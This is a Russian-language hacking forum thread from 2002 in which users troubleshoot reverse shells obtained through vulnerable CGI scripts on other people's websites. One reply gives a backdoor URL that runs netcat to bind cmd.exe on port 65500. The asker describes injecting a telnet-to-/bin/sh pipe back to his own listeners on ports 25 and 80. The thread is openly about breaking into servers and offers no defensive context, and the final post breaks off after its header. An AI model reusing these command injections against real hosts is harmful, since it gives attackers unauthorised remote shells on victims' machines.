При установке реверсивного сеанса телнет при помоши дырявого цги скрипта через броузер неткат на моей машине сразу обрывает соеденение. Почему? Фтп устанавливаетя нормально.
Вопрос по netcat11.06.02 13:39 Автор: Zlobnui_Mydak[HitU] <Pr3DV+0Я> Статус: Member
может там стоит firewall а может и руки кривоватые ;))) вот пример-если выйдет-напиши
/cgi-bin/scripts/root.exe?/c+nc.exe+-l+-p+65500+-e+cmd.exe
потом ломишься на 65500 порт...кстати есть прога PUTTY намного удобнее телнета.
Вопрос по netcat12.06.02 16:41 Автор: malunack Статус: Незарегистрированный пользователь
> может там стоит firewall а может и руки кривоватые ;))) вот > пример-если выйдет-напиши > /cgi-bin/scripts/root.exe?/c+nc.exe+-l+-p+65500+-e+cmd.exe > потом ломишься на 65500 порт...кстати есть прога PUTTY > намного удобнее телнета.
Неткат находится на моей машине. Схема такая: в броузере на дырявом сайте я набираю telnet+<мойip>+25+|+/bih/sh+telnet+<мой ip>+80.
На моей машине в двух разных окнах запущено nc -l -n -v -p 25 и
nc -l -n -v -p 80. Тискаю на ввод в броузере и на моем порту 25 неткат пишет, что удаленная машина установила соеденение и сразу же вываливается в шелл. Порты пробовал разные. Если все это делать из командной оболочки
другого удаленного сервера то соеденение на моей машине не рвется.
Што за грабли такие?
а если так?14.06.02 13:26 Автор: Zlobnui_Mydak[HitU] <Pr3DV+0Я> Статус: Member